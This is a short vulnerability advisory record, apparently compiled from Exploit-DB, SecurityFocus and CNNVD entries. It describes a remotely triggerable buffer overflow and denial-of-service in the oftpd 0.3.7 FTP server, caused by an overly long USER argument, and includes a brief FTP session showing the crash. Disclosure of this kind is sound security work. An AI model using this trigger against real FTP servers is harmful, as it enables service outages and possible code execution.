https://www.exploit-db.com/exploits/25943
https://www.securityfocus.com/bid/89737
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-142

oftpd是一款FTP服务端软件。oftpd0.3.7版本中存在拒绝服务漏洞。远程攻击者可通过带有大量空()字符的USER命令，使系统拒绝服务.

source: http://www.securityfocus.com/bid/14161/info

oftpd is prone to a remotely exploitable buffer overflow. This may be triggered by a client through an overly long argument for the USER command.

Successful exploitation may let a remote attacker execute arbitrary code in the context of the server process. 

530 Only anonymous FTP supported.
ftp: Login failed.
ftp> user
(username)
usage: user username [password [account]]
ftp> user  (much larger string)
500 Syntax error, command unrecognized.
Login failed.
ftp> user
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x30303054
0x969b56d8 in history ()

oftpd oftpd 0.3.7

来源:SECTRACK
名称:1014413
链接:http://securitytracker.com/id?1014413